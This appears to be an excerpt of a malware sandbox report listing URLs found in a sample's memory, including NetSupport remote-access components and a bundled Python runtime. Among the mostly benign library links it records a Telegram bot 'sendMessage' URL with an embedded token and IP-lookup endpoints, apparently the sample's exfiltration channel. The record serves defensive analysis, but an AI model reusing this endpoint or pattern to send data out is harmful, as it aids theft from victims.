                                Source: BUenB12U2a.exe, 00000001.00000003.2014331159.0000020E470CE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025796850.0000020E470DD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013058865.0000020E470C0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014367066.0000020E470D3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007984529.0000020E47096000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008110691.0000020E470A3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015526736.0000020E470DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                Source: BUenB12U2a.exe, 00000001.00000003.1749010474.0000020E476F1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749618127.0000020E476F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11
                                Source: BUenB12U2a.exe, 00000001.00000003.1790469872.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: BUenB12U2a.exe, 00000001.00000003.1749010474.0000020E476F1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749010474.0000020E47698000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749618127.0000020E476F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.2025360667.0000020E48050000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2027208702.0000020E48065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                                Source: BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E47853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                                Source: BUenB12U2a.exe, 00000001.00000003.2016057686.0000020E4723E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751127839.0000020E4785D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2017154557.0000020E4723E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751007347.0000020E4783B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2018004144.0000020E4723F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014516835.0000020E4723D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                Source: BUenB12U2a.exe, 00000001.00000003.2009944197.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015700374.0000020E470E5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008865217.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2017488484.0000020E470E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013944849.0000020E470E4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011806951.0000020E47367000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2018402430.0000020E470E7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008082192.0000020E470E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007984529.0000020E47096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.com/
                                Source: powershell.exe, 00000003.00000002.1919245142.000001C999F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: BUenB12U2a.exe, 00000001.00000002.2039408751.0000020E47F88000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/?format=json
                                Source: BUenB12U2a.exe, 00000001.00000002.2035623903.0000020E470F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org?format=json
                                Source: BUenB12U2a.exe, 00000001.00000002.2035623903.0000020E470F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                                Source: BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7811330773:AAE5517qUHfPZHj-CuDC3r8ysOsJKklxmuQ/sendMessage
                                Source: BUenB12U2a.exe, 00000001.00000002.2038640444.0000020E479F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                                Source: BUenB12U2a.exe, 00000001.00000003.2014963354.0000020E475FC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1748207345.0000020E4736B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749653867.0000020E4736B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2027572735.0000020E47375000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007807265.0000020E47374000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013416055.0000020E47375000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2036919019.0000020E475FC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749155705.0000020E4736B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2033757085.0000020E46DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2033757085.0000020E46DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2033757085.0000020E46DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                                Source: BUenB12U2a.exe, 00000001.00000002.2038962432.0000020E47D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
                                Source: BUenB12U2a.exe, 00000001.00000003.2012932665.0000020E47299000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008347211.0000020E47252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exiv2.org/tags.html)
                                Source: powershell.exe, 00000003.00000002.1919245142.000001C99A148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2034663134.0000020E46FF0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                Source: BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011743711.0000020E47844000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E2C000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011090060.0000020E4783C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2037682578.0000020E47846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                                Source: BUenB12U2a.exe, 00000001.00000002.2038962432.0000020E47D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-pillow/Pillow/
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                Source: BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738789207.0000020E4535B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2034663134.0000020E46FF0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                Source: BUenB12U2a.exe, 00000001.00000003.2016384979.0000020E4768A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2037288027.0000020E47765000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009835211.0000020E47756000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751205141.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2022207937.0000020E47762000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1790538475.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015097773.0000020E47682000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E476F6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014768161.0000020E4767B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008522179.0000020E47737000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019182896.0000020E47693000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792680194.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795769765.0000020E47763000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012024639.0000020E47760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                                Source: BUenB12U2a.exe, 00000001.00000003.2026407747.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015356764.0000020E4534D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030735566.0000020E4534F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008262582.0000020E4534C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015959621.0000020E4534E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2034663134.0000020E46FF0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740631689.0000020E4534E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                Source: BUenB12U2a.exe, 00000001.00000002.2036772509.0000020E474F0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746826345.0000020E473C6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749962096.0000020E473C6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038745783.0000020E47AF0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749155705.0000020E473C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/1850
                                Source: BUenB12U2a.exe, 00000001.00000002.2038745783.0000020E47AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/18500
                                Source: BUenB12U2a.exe, 00000001.00000002.2038640444.0000020E479F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/497
                                Source: powershell.exe, 00000003.00000002.1941025395.000001C9B2179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
                                Source: BUenB12U2a.exe, 00000001.00000003.2009164213.0000020E472D7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009311750.0000020E472DC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008219589.0000020E472D6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012721726.0000020E47312000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007926988.0000020E47311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                Source: BUenB12U2a.exe, 00000001.00000003.1795769765.0000020E47763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                                Source: BUenB12U2a.exe, 00000001.00000003.1750148610.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013512531.0000020E472CB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1748663176.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746826345.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744363937.0000020E472C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                                Source: BUenB12U2a.exe, 00000001.00000002.2038850666.0000020E47C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                                Source: BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008684232.0000020E4770E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009724569.0000020E47735000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009990846.0000020E472D9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008347211.0000020E47252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                Source: BUenB12U2a.exe, 00000001.00000003.1790538475.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014555113.0000020E4785B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011743711.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751007347.0000020E4783B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795769765.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751205141.0000020E477BF000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792680194.0000020E47853000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E47853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2036666930.0000020E473F0000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744363937.0000020E47300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                                Source: BUenB12U2a.exe, 00000001.00000002.2043708725.00007FFDFB50B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                                Source: BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792155836.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011743711.0000020E47844000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E2C000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011090060.0000020E4783C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2037682578.0000020E47846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
                                Source: BUenB12U2a.exe, 00000001.00000003.2009164213.0000020E472D7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009311750.0000020E472DC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008219589.0000020E472D6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012721726.0000020E47312000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007926988.0000020E47311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                Source: BUenB12U2a.exe, 00000001.00000002.2036772509.0000020E474F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
